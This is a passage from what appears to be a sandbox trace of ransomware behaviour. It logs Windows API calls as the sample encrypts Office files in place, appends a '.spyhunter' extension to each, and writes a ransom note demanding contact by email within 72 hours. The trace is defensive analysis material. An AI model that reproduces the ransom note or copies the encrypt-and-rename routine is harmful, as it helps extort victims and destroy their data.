lpSrch=".txt") returned 0x0 [0098.901] GetProcessHeap () returned 0x2c0000 [0098.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0098.901] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f90c*=0xb96, lpOverlapped=0x0) returned 1 [0098.943] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff46a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.943] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb96, lpNumberOfBytesWritten=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f90c*=0xb96, lpOverlapped=0x0) returned 1 [0098.944] GetProcessHeap () returned 0x2c0000 [0098.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0098.944] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.944] WriteFile (in: hFile=0x16c, lpBuffer=0x270f94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x270f94c*, lpNumberOfBytesWritten=0x270f90c*=0x4, lpOverlapped=0x0) returned 1 [0098.944] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f90c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f90c*=0x30, lpOverlapped=0x0) returned 1 [0098.944] CloseHandle (hObject=0x16c) returned 1 [0098.944] GetProcessHeap () returned 0x2c0000 [0098.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0098.945] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF.spyhunter") returned 75 [0098.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl2.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl2.wmf.spyhunter")) returned 1 [0098.945] GetProcessHeap () returned 0x2c0000 [0098.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0098.945] GetProcessHeap () returned 0x2c0000 [0098.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0098.945] GetProcessHeap () returned 0x2c0000 [0098.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e7c0 | out: hHeap=0x2c0000) returned 1 [0099.071] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0099.071] WriteFile (in: hFile=0x16c, lpBuffer=0x270f877*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270f9a0, lpOverlapped=0x0 | out: lpBuffer=0x270f877*, lpNumberOfBytesWritten=0x270f9a0*=0x127, lpOverlapped=0x0) returned 1 [0099.077] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0099.077] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270f9a0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270f9a0*=0x2ac, lpOverlapped=0x0) returned 1 [0099.077] CloseHandle (hObject=0x16c) returned 1 [0099.077] GetProcessHeap () returned 0x2c0000 [0099.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0099.078] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f940 | out: pbBuffer=0x270f940) returned 1 [0099.078] GetProcessHeap () returned 0x2c0000 [0099.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0099.078] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f938*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f938*=0x30) returned 1 [0099.078] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02198_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0099.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF") returned 80 [0099.078] StrStrW (lpFirst="WB02198_.GIF", lpSrch=".txt") returned 0x0 [0099.078] GetProcessHeap () returned 0x2c0000 [0099.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0099.078] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0099.214] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.214] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0099.214] GetProcessHeap () returned 0x2c0000 [0099.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0099.214] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.214] WriteFile (in: hFile=0x16c, lpBuffer=0x270f93c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8fc, lpOverlapped=0x0 | out: lpBuffer=0x270f93c*, lpNumberOfBytesWritten=0x270f8fc*=0x4, lpOverlapped=0x0) returned 1 [0099.223] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8fc*=0x30, lpOverlapped=0x0) returned 1 [0099.223] CloseHandle (hObject=0x16c) returned 1 [0099.223] GetProcessHeap () returned 0x2c0000 [0099.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.223] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.spyhunter") returned 90 [0099.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02198_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02198_.gif.spyhunter")) returned 1 [0099.229] GetProcessHeap () returned 0x2c0000 [0099.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.229] GetProcessHeap () returned 0x2c0000 [0099.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0099.229] GetProcessHeap () returned 0x2c0000 [0099.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352c68 | out: hHeap=0x2c0000) returned 1 [0099.229] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f938 | out: pbBuffer=0x270f938) returned 1 [0099.229] GetProcessHeap () returned 0x2c0000 [0099.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0099.229] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f930*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f930*=0x30) returned 1 [0099.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\thatch.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.777] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx") returned 68 [0099.777] StrStrW (lpFirst="Thatch.thmx", lpSrch=".txt") returned 0x0 [0099.777] GetProcessHeap () returned 0x2c0000 [0099.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0099.777] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0099.802] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.802] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0099.802] GetProcessHeap () returned 0x2c0000 [0099.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0099.802] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.803] WriteFile (in: hFile=0x154, lpBuffer=0x270f934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x270f934*, lpNumberOfBytesWritten=0x270f8f4*=0x4, lpOverlapped=0x0) returned 1 [0099.850] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8f4*=0x30, lpOverlapped=0x0) returned 1 [0099.850] CloseHandle (hObject=0x154) returned 1 [0099.850] GetProcessHeap () returned 0x2c0000 [0099.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.851] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx.spyhunter") returned 78 [0099.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\thatch.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\thatch.thmx.spyhunter")) returned 1 [0099.854] GetProcessHeap () returned 0x2c0000 [0099.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.854] GetProcessHeap () returned 0x2c0000 [0099.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0099.854] GetProcessHeap () returned 0x2c0000 [0099.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16c08 | out: hHeap=0x2c0000) returned 1 [0099.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f938 | out: pbBuffer=0x270f938) returned 1 [0099.854] GetProcessHeap () returned 0x2c0000 [0099.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0099.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f930*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f930*=0x30) returned 1 [0099.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\pushpin.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.868] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx") returned 69 [0099.868] StrStrW (lpFirst="Pushpin.thmx", lpSrch=".txt") returned 0x0 [0099.868] GetProcessHeap () returned 0x2c0000 [0099.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0099.869] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0099.898] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.898] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0099.898] GetProcessHeap () returned 0x2c0000 [0099.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0099.898] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.899] WriteFile (in: hFile=0x154, lpBuffer=0x270f934*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x270f934*, lpNumberOfBytesWritten=0x270f8f4*=0x4, lpOverlapped=0x0) returned 1 [0099.937] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8f4*=0x30, lpOverlapped=0x0) returned 1 [0099.937] CloseHandle (hObject=0x154) returned 1 [0100.199] GetProcessHeap () returned 0x2c0000 [0100.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0100.199] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx.spyhunter") returned 79 [0100.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\pushpin.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\pushpin.thmx.spyhunter")) returned 1 [0100.200] GetProcessHeap () returned 0x2c0000 [0100.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0100.200] GetProcessHeap () returned 0x2c0000 [0100.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.200] GetProcessHeap () returned 0x2c0000 [0100.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16980 | out: hHeap=0x2c0000) returned 1 [0100.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f930 | out: pbBuffer=0x270f930) returned 1 [0100.200] GetProcessHeap () returned 0x2c0000 [0100.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.200] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f928*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f928*=0x30) returned 1 [0100.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0100.312] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml") returned 79 [0100.312] StrStrW (lpFirst="Verve.xml", lpSrch=".txt") returned 0x0 [0100.313] GetProcessHeap () returned 0x2c0000 [0100.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.313] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8ec*=0x3c0, lpOverlapped=0x0) returned 1 [0100.412] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffc40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.412] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8ec*=0x3c0, lpOverlapped=0x0) returned 1 [0100.547] GetProcessHeap () returned 0x2c0000 [0100.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.547] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.547] WriteFile (in: hFile=0xec, lpBuffer=0x270f92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x270f92c*, lpNumberOfBytesWritten=0x270f8ec*=0x4, lpOverlapped=0x0) returned 1 [0100.547] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8ec*=0x30, lpOverlapped=0x0) returned 1 [0100.547] CloseHandle (hObject=0xec) returned 1 [0100.601] GetProcessHeap () returned 0x2c0000 [0100.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0100.601] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.spyhunter") returned 89 [0100.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Verve.xml.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\verve.xml.spyhunter")) returned 1 [0100.610] GetProcessHeap () returned 0x2c0000 [0100.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0100.611] GetProcessHeap () returned 0x2c0000 [0100.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.612] GetProcessHeap () returned 0x2c0000 [0100.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0100.612] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f930 | out: pbBuffer=0x270f930) returned 1 [0100.612] GetProcessHeap () returned 0x2c0000 [0100.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.612] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f928*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f928*=0x30) returned 1 [0100.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\trek.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0100.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx") returned 66 [0100.622] StrStrW (lpFirst="Trek.thmx", lpSrch=".txt") returned 0x0 [0100.623] GetProcessHeap () returned 0x2c0000 [0100.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0100.623] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0100.641] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.642] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8ec*=0x2800, lpOverlapped=0x0) returned 1 [0100.642] GetProcessHeap () returned 0x2c0000 [0100.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0100.642] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.642] WriteFile (in: hFile=0xec, lpBuffer=0x270f92c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x270f92c*, lpNumberOfBytesWritten=0x270f8ec*=0x4, lpOverlapped=0x0) returned 1 [0100.652] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8ec*=0x30, lpOverlapped=0x0) returned 1 [0100.652] CloseHandle (hObject=0xec) returned 1 [0100.652] GetProcessHeap () returned 0x2c0000 [0100.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.653] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx.spyhunter") returned 76 [0100.653] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\trek.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx.spyhunter" (normalized: "c:\\program files\\microsoft office\\document themes 14\\trek.thmx.spyhunter")) returned 1 [0100.653] GetProcessHeap () returned 0x2c0000 [0100.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.653] GetProcessHeap () returned 0x2c0000 [0100.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.654] GetProcessHeap () returned 0x2c0000 [0100.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ed70 | out: hHeap=0x2c0000) returned 1 [0100.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f928 | out: pbBuffer=0x270f928) returned 1 [0100.655] GetProcessHeap () returned 0x2c0000 [0100.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f920*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f920*=0x30) returned 1 [0100.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0100.656] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft 